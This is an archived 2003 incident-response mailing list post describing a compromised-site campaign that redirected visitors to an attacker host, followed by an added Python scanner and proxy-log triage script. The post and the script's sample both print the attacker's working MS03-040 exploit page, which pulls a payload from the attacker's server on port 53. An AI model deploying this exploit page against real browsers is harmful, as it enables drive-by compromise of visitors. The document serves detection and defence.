Security Incidents mailing list archives
RE: Proxy attackers/hijackers
From: "James C. Slora, Jr." <james.slora () phra com>
Date: Fri, 17 Oct 2003 16:45:20 -0400
Steve Carey wrote:

The autoproxy Trojan you mentioned is detected by Norton Anti-virus as 'backdoor.coreflood Trojan', per the write-up from the site you provided, but there is another autoproxy Trojan that is not identified as a Trojan. There is a new site (216.247.117.225 - shows up as chinesenaming.com and wvw.goling.com (wvw is not a misprint)) that is running malicious code when users connect to it (with ActiveX enabled).
Add wvw.goling2003.com to the list of other names for 216.247.117.225.

My users did not get to the site through spam links; they were directed there from compromised Interland (again!?) sites running IIS 5.0 and MicrosoftOfficeWebServer 5.0 (also really IIS 5.0). On infected sites, every page generated a new hit to wvw.goling2003.com. Compromised sites were in these networks:

64.225.xx.xx
64.224.xx.xx

The infected pages have since been cleaned.

Connection to this hostname returns different data from the hostnames you listed, although it is the same IP address (I know this is not unusual, just trying to be clear).

http://wvw.goling2003.com uses the XML CDATA Object vulnerability fixed by MS03-040 to try to force retrieval of:

http://wvw.goling2003.com:53/inf.ooo

That page currently gives a "connection refused" message. Maybe it is used to record who was vulnerable to the CDATA exploit. Users who visited the exploit page did not generate hits to inf.ooo, because their machines were patched, so I don't know if the page previously returned anything else.

Code for wvw.goling2003.com/main.html:

<html><body>
<!-- the bound span renders whatever the island supplies as HTML -->
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data="http://wvw.goling2003.com:53/inf.ooo" width=0 height=0>
]]>
</exploit>
</security>
</xml>
</body></html>
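Two checks that follow from the message above, written here as an added example (this is not code from the thread, from Interland, or from any product it mentions). The first scans page content for the MS03-040 data-binding pattern James posted: a consumer element with dataformatas="html" bound to an <xml> data island whose CDATA smuggles in an <object> or similar tag. The second triages a proxy log the way the message reasons about it: a client that requested the landing page but never the port-53 payload URL was exposed but (per the post) patched, while a client that did request the payload needs a look. The sample page is modelled on the posted main.html, the log lines are constructed in Squid native format (an assumption; any log with a client column and a URL column works the same way), and the hostname and port are the ones from the post. The scanner is regex-based rather than a full HTML parser, so obfuscated variants (entity-encoded tags, split attributes) will evade it.

```python
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the main.html posted above: the bound <span>,
# the <xml> data island, and the CDATA-wrapped <object> are the same; everything
# is inline so this runs offline.
SAMPLE_EXPLOIT_PAGE = """<html><body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object data="http://wvw.goling2003.com:53/inf.ooo" width=0 height=0>
]]></exploit></security></xml>
</body></html>"""

# Constructed benign page: data binding used for text, not HTML, so nothing is injected.
SAMPLE_BENIGN_PAGE = """<html><body>
<span datasrc="#prices" datafld="amount"></span>
<xml id="prices"><row><amount>42</amount></row></xml>
</body></html>"""

# Constructed proxy log in Squid native format (assumption: any proxy log with a
# client column and a URL column can be split the same way). 10.1.1.20 fetched the
# landing page and then the port-53 payload URL; 10.1.1.31 fetched only the landing page.
SAMPLE_PROXY_LOG = """\
1066422000.123 45 10.1.1.20 TCP_MISS/200 612 GET http://wvw.goling2003.com/main.html - DIRECT/216.247.117.225 text/html
1066422001.456 10 10.1.1.20 TCP_MISS/000 0 GET http://wvw.goling2003.com:53/inf.ooo - DIRECT/216.247.117.225 -
1066422010.789 40 10.1.1.31 TCP_MISS/200 612 GET http://wvw.goling2003.com/main.html - DIRECT/216.247.117.225 text/html
1066422020.000 30 10.1.1.42 TCP_MISS/200 2048 GET http://www.example.com/index.html - DIRECT/192.0.2.10 text/html
"""

# An element that consumes a data island via datasrc="#id".
CONSUMER_RE = re.compile(r'<(?:span|div|td|p)\b[^>]*\bdatasrc\s*=\s*["\']?#(\w+)[^>]*>', re.I)
# dataformatas="html" is what makes the bound text get rendered as markup.
HTML_FORMAT_RE = re.compile(r'\bdataformatas\s*=\s*["\']?html', re.I)
# A data island and its body.
ISLAND_RE = re.compile(r'<xml\b[^>]*\bid\s*=\s*["\']?(\w+)["\']?[^>]*>(.*?)</xml>', re.I | re.S)
CDATA_RE = re.compile(r'<!\[CDATA\[(.*?)\]\]>', re.S)
# Tags that load or run something when injected through the binding.
ACTIVE_TAG_RE = re.compile(r'<(object|embed|script|iframe|applet)\b[^>]*>', re.I)
URL_RE = re.compile(r'\b(?:data|src|codebase)\s*=\s*["\']?([^"\'\s>]+)', re.I)


def find_data_binding_injection(html):
    """Return one finding per active tag smuggled through an HTML-formatted data binding.

    Pattern: a consumer element with dataformatas="html" bound to an <xml> island whose
    CDATA content contains an <object>/<script>/... tag. Plain data binding (no
    dataformatas="html") is ignored, so ordinary pages do not trigger.
    """
    html_bound = set()
    for m in CONSUMER_RE.finditer(html):
        if HTML_FORMAT_RE.search(m.group(0)):
            html_bound.add(m.group(1).lower())
    findings = []
    for m in ISLAND_RE.finditer(html):
        island_id, body = m.group(1), m.group(2)
        if island_id.lower() not in html_bound:
            continue
        for cdata in CDATA_RE.finditer(body):
            for tag in ACTIVE_TAG_RE.finditer(cdata.group(1)):
                url = URL_RE.search(tag.group(0))
                findings.append({"island": island_id, "tag": tag.group(1).lower(),
                                 "url": url.group(1) if url else None})
    return findings


def triage_proxy_log(log_text, landing_host="wvw.goling2003.com", payload_port=53):
    """Split clients into those that only loaded the landing page and those that also
    requested the port-53 payload URL. A patched browser never requests the payload, so
    a client under "likely_unpatched" needs a look regardless of whether that request
    succeeded (the payload server was refusing connections when the post was written).
    """
    seen_landing, seen_payload = set(), set()
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        parts = urlsplit(url)
        if parts.hostname != landing_host:
            continue
        (seen_payload if parts.port == payload_port else seen_landing).add(client)
    return {
        "exposed_only": sorted(seen_landing - seen_payload),
        "likely_unpatched": sorted(seen_payload),
    }


if __name__ == "__main__":
    for name, page in (("exploit", SAMPLE_EXPLOIT_PAGE), ("benign", SAMPLE_BENIGN_PAGE)):
        print(name, find_data_binding_injection(page))
    print(triage_proxy_log(SAMPLE_PROXY_LOG))
```

Run against real content, the page check belongs on a web proxy or in a scan of your own IIS hosts' pages (the post's compromised sites injected the reference into every page, so a single match on a site you own means the site itself is compromised, not just a visitor). The log check only tells you who to look at; whether a client in "likely_unpatched" actually ran something depends on what inf.ooo returned at the time, which the post could not determine.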
Current thread:
- Proxy attackers/hijackers Jeff Kell (Oct 17)
- Re: Proxy attackers/hijackers Joe Stewart (Oct 17)
- <Possible follow-ups>
- RE: Proxy attackers/hijackers Carey, Steve T GARRISON (Oct 17)
- Proxy attackers/hijackers Thomas Willner (Oct 20)
- Re: [Dshield] Proxy attackers/hijackers Thor Larholm (Oct 19)
- RE: Proxy attackers/hijackers James C. Slora, Jr. (Oct 20)
